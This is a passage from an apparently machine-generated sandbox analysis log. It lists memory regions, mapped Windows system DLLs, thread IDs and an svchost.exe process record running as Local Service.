filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1517
start_va = 0x7fefd210000
end_va = 0x7fefd23efff
monitored = 0
entry_point = 0x7fefd211064
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 1518
start_va = 0x7fefd250000
end_va = 0x7fefd2bcfff
monitored = 0
entry_point = 0x7fefd251010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1519
start_va = 0x7fefd2c0000
end_va = 0x7fefd2d3fff
monitored = 0
entry_point = 0x7fefd2c4160
region_type = mapped_file
name = "cryptdll.dll"
filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")
Region:
id = 1520
start_va = 0x7fefd520000
end_va = 0x7fefd527fff
monitored = 0
entry_point = 0x7fefd522a6c
region_type = mapped_file
name = "wmsgapi.dll"
filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")
Region:
id = 1521
start_va = 0x7fefd530000
end_va = 0x7fefd539fff
monitored = 0
entry_point = 0x7fefd533b40
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 1522
start_va = 0x7fefd540000
end_va = 0x7fefd562fff
monitored = 0
entry_point = 0x7fefd541198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 1523
start_va = 0x7fefd5e0000
end_va = 0x7fefd5eafff
monitored = 0
entry_point = 0x7fefd5e1030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1524
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
monitored = 0
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1525
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
monitored = 0
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1526
start_va = 0x7fefd650000
end_va = 0x7fefd6e0fff
monitored = 0
entry_point = 0x7fefd651440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1527
start_va = 0x7fefd6f0000
end_va = 0x7fefd72cfff
monitored = 0
entry_point = 0x7fefd6f18f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1528
start_va = 0x7fefd730000
end_va = 0x7fefd743fff
monitored = 0
entry_point = 0x7fefd7310e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1529
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
monitored = 0
entry_point = 0x7fefd7519b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1530
start_va = 0x7fefd7f0000
end_va = 0x7fefd7fefff
monitored = 0
entry_point = 0x7fefd7f1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1531
start_va = 0x7fefd800000
end_va = 0x7fefd96cfff
monitored = 0
entry_point = 0x7fefd8010b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1532
start_va = 0x7fefd970000
end_va = 0x7fefd9dbfff
monitored = 0
entry_point = 0x7fefd972780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1533
start_va = 0x7fefd9e0000
end_va = 0x7fefda1afff
monitored = 0
entry_point = 0x7fefd9e1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1534
start_va = 0x7fefda20000
end_va = 0x7fefda55fff
monitored = 0
entry_point = 0x7fefda21474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1535
start_va = 0x7fefda60000
end_va = 0x7fefda79fff
monitored = 0
entry_point = 0x7fefda61558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1536
start_va = 0x7fefdca0000
end_va = 0x7fefdd38fff
monitored = 0
entry_point = 0x7fefdca1c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1537
start_va = 0x7fefdd40000
end_va = 0x7fefde6cfff
monitored = 0
entry_point = 0x7fefdd8ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1538
start_va = 0x7fefde70000
end_va = 0x7fefded6fff
monitored = 0
entry_point = 0x7fefde7b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1539
start_va = 0x7fefdee0000
end_va = 0x7fefec67fff
monitored = 0
entry_point = 0x7fefdf5cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1540
start_va = 0x7fefec70000
end_va = 0x7fefed78fff
monitored = 0
entry_point = 0x7fefec71064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1541
start_va = 0x7fefef30000
end_va = 0x7fefefa0fff
monitored = 0
entry_point = 0x7fefef41e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1542
start_va = 0x7fefefb0000
end_va = 0x7feff08afff
monitored = 0
entry_point = 0x7fefefd0760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1543
start_va = 0x7feff090000
end_va = 0x7feff12efff
monitored = 0
entry_point = 0x7feff0925a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1544
start_va = 0x7feff130000
end_va = 0x7feff137fff
monitored = 0
entry_point = 0x7feff131504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1545
start_va = 0x7feff140000
end_va = 0x7feff15efff
monitored = 0
entry_point = 0x7feff1460e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1546
start_va = 0x7feff180000
end_va = 0x7feff1d1fff
monitored = 0
entry_point = 0x7feff1810d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1547
start_va = 0x7feff1e0000
end_va = 0x7feff2b6fff
monitored = 0
entry_point = 0x7feff1e3274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1548
start_va = 0x7feff2c0000
end_va = 0x7feff2edfff
monitored = 0
entry_point = 0x7feff2c1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1549
start_va = 0x7feff2f0000
end_va = 0x7feff4f2fff
monitored = 0
entry_point = 0x7feff313330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1550
start_va = 0x7feff5a0000
end_va = 0x7feff5adfff
monitored = 0
entry_point = 0x7feff5a1080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1551
start_va = 0x7feff5b0000
end_va = 0x7feff678fff
monitored = 0
entry_point = 0x7feff62a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1552
start_va = 0x7feff680000
end_va = 0x7feff856fff
monitored = 0
entry_point = 0x7feff681010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1553
start_va = 0x7feffac0000
end_va = 0x7feffb0cfff
monitored = 0
entry_point = 0x7feffac1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1554
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1555
start_va = 0x7fffff4c000
end_va = 0x7fffff4dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff4c000"
filename = ""
Region:
id = 1556
start_va = 0x7fffff4e000
end_va = 0x7fffff4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff4e000"
filename = ""
Region:
id = 1557
start_va = 0x7fffff50000
end_va = 0x7fffff51fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff50000"
filename = ""
Region:
id = 1558
start_va = 0x7fffff52000
end_va = 0x7fffff53fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff52000"
filename = ""
Region:
id = 1559
start_va = 0x7fffff54000
end_va = 0x7fffff55fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff54000"
filename = ""
Region:
id = 1560
start_va = 0x7fffff56000
end_va = 0x7fffff57fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff56000"
filename = ""
Region:
id = 1561
start_va = 0x7fffff58000
end_va = 0x7fffff59fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff58000"
filename = ""
Region:
id = 1562
start_va = 0x7fffff5a000
end_va = 0x7fffff5bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5a000"
filename = ""
Region:
id = 1563
start_va = 0x7fffff5c000
end_va = 0x7fffff5dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5c000"
filename = ""
Region:
id = 1564
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 1565
start_va = 0x7fffff60000
end_va = 0x7fffff61fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 1566
start_va = 0x7fffff62000
end_va = 0x7fffff63fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff62000"
filename = ""
Region:
id = 1567
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 1568
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 1569
start_va = 0x7fffff6a000
end_va = 0x7fffff6bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6a000"
filename = ""
Region:
id = 1570
start_va = 0x7fffff6c000
end_va = 0x7fffff6dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6c000"
filename = ""
Region:
id = 1571
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 1572
start_va = 0x7fffff72000
end_va = 0x7fffff73fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff72000"
filename = ""
Region:
id = 1573
start_va = 0x7fffff78000
end_va = 0x7fffff79fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff78000"
filename = ""
Region:
id = 1574
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 1575
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 1576
start_va = 0x7fffff80000
end_va = 0x7fffff81fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 1577
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 1578
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 1579
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 1580
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 1581
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 1582
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 1583
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 1584
start_va = 0x7fffff96000
end_va = 0x7fffff97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff96000"
filename = ""
Region:
id = 1585
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 1586
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 1587
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 1588
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 1589
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 1590
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 1591
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 1592
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 1593
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 1594
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 1595
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 1596
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1597
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1598
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 1599
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 1600
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1601
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1602
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1603
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1604
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1659
start_va = 0x7fef1800000
end_va = 0x7fef19d3fff
monitored = 0
entry_point = 0x7fef1836b00
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 1660
start_va = 0x3640000
end_va = 0x383ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003640000"
filename = ""
Region:
id = 1661
start_va = 0x3640000
end_va = 0x37affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003640000"
filename = ""
Region:
id = 1662
start_va = 0x37c0000
end_va = 0x383ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000037c0000"
filename = ""
Region:
id = 1663
start_va = 0x3410000
end_va = 0x34fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003410000"
filename = ""
Region:
id = 1664
start_va = 0x5dc0000
end_va = 0x61bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005dc0000"
filename = ""
Region:
id = 1665
start_va = 0x930000
end_va = 0x930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 1666
start_va = 0x940000
end_va = 0x95ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000940000"
filename = ""
Region:
id = 1667
start_va = 0x7fef89f0000
end_va = 0x7fef8a6bfff
monitored = 0
entry_point = 0x7fef89f11d4
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 1668
start_va = 0x1600000
end_va = 0x168ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001600000"
filename = ""
Region:
id = 1669
start_va = 0x960000
end_va = 0x962fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wuaueng.dll.mui"
filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui")
Region:
id = 1670
start_va = 0x970000
end_va = 0x97ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 1671
start_va = 0x1380000
end_va = 0x138ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 1672
start_va = 0x1390000
end_va = 0x139ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 1673
start_va = 0x970000
end_va = 0x97ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 1674
start_va = 0x1380000
end_va = 0x138ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 1675
start_va = 0x1390000
end_va = 0x139ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 1676
start_va = 0x24d0000
end_va = 0x254ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024d0000"
filename = ""
Region:
id = 1677
start_va = 0x26e0000
end_va = 0x2789fff
monitored = 0
entry_point = 0x26e4104
region_type = mapped_file
name = "wuapi.dll"
filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")
Region:
id = 1678
start_va = 0x2d30000
end_va = 0x2daffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d30000"
filename = ""
Region:
id = 1679
start_va = 0x3640000
end_va = 0x36bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003640000"
filename = ""
Region:
id = 1680
start_va = 0x3730000
end_va = 0x37affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003730000"
filename = ""
Region:
id = 1681
start_va = 0x3860000
end_va = 0x38dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003860000"
filename = ""
Region:
id = 1682
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 1683
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 1684
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 1685
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1686
start_va = 0x970000
end_va = 0x97cfff
monitored = 0
entry_point = 0x97a138
region_type = mapped_file
name = "wuauclt.exe"
filename = "\\Windows\\System32\\wuauclt.exe" (normalized: "c:\\windows\\system32\\wuauclt.exe")
Region:
id = 1687
start_va = 0x4250000
end_va = 0x449efff
monitored = 0
entry_point = 0x425236c
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 1688
start_va = 0x970000
end_va = 0x970fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000970000"
filename = ""
Region:
id = 1689
start_va = 0x2720000
end_va = 0x279ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 1690
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 1691
start_va = 0x970000
end_va = 0x970fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000970000"
filename = ""
Region:
id = 1858
start_va = 0x3650000
end_va = 0x36cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003650000"
filename = ""
Thread:
id = 43
os_tid = 0xf1c
Thread:
id = 44
os_tid = 0xf10
Thread:
id = 45
os_tid = 0xf0c
Thread:
id = 46
os_tid = 0xea4
Thread:
id = 47
os_tid = 0x8bc
Thread:
id = 48
os_tid = 0x804
Thread:
id = 49
os_tid = 0x754
Thread:
id = 50
os_tid = 0x4a4
Thread:
id = 51
os_tid = 0x634
Thread:
id = 52
os_tid = 0x4fc
Thread:
id = 53
os_tid = 0x34c
Thread:
id = 54
os_tid = 0x584
Thread:
id = 55
os_tid = 0x268
Thread:
id = 56
os_tid = 0x77c
Thread:
id = 57
os_tid = 0x4c0
Thread:
id = 58
os_tid = 0x484
Thread:
id = 59
os_tid = 0x128
Thread:
id = 60
os_tid = 0x12c
Thread:
id = 61
os_tid = 0x3e8
Thread:
id = 62
os_tid = 0x7f0
Thread:
id = 63
os_tid = 0x478
Thread:
id = 64
os_tid = 0x494
Thread:
id = 65
os_tid = 0x444
Thread:
id = 66
os_tid = 0x440
Thread:
id = 67
os_tid = 0x76c
Thread:
id = 68
os_tid = 0x748
Thread:
id = 69
os_tid = 0x730
Thread:
id = 70
os_tid = 0x724
Thread:
id = 71
os_tid = 0x718
Thread:
id = 72
os_tid = 0x6fc
Thread:
id = 73
os_tid = 0x6e8
Thread:
id = 74
os_tid = 0x6e0
Thread:
id = 75
os_tid = 0x6c0
Thread:
id = 76
os_tid = 0x6ac
Thread:
id = 77
os_tid = 0x694
Thread:
id = 78
os_tid = 0x4b0
Thread:
id = 79
os_tid = 0x4ac
Thread:
id = 80
os_tid = 0x49c
Thread:
id = 81
os_tid = 0x498
Thread:
id = 82
os_tid = 0x48c
Thread:
id = 83
os_tid = 0x1bc
Thread:
id = 84
os_tid = 0x120
Thread:
id = 85
os_tid = 0x3f0
Thread:
id = 86
os_tid = 0x3e4
Thread:
id = 87
os_tid = 0x3d8
Thread:
id = 88
os_tid = 0x37c
Thread:
id = 89
os_tid = 0x36c
Thread:
id = 90
os_tid = 0x364
Thread:
id = 91
os_tid = 0xf28
Thread:
id = 92
os_tid = 0xf2c
Thread:
id = 93
os_tid = 0xf30
Thread:
id = 94
os_tid = 0xf34
Thread:
id = 95
os_tid = 0xf38
Thread:
id = 96
os_tid = 0xf3c
Thread:
id = 98
os_tid = 0xf5c
Thread:
id = 99
os_tid = 0xf60
Thread:
id = 100
os_tid = 0xf64
Thread:
id = 101
os_tid = 0xf68
Thread:
id = 102
os_tid = 0xf70
Thread:
id = 125
os_tid = 0xf9c
Thread:
id = 129
os_tid = 0xc8c
Process:
id = "7"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0xdb4d000"
os_pid = "0x2c0"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "6"
os_parent_pid = "0x1c8"
cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7ac" [0xc000000f], "LOCAL" [0x7]
Region:
id = 1695
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1696
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 1697
start_va = 0x30000
end_va = 0x33fff
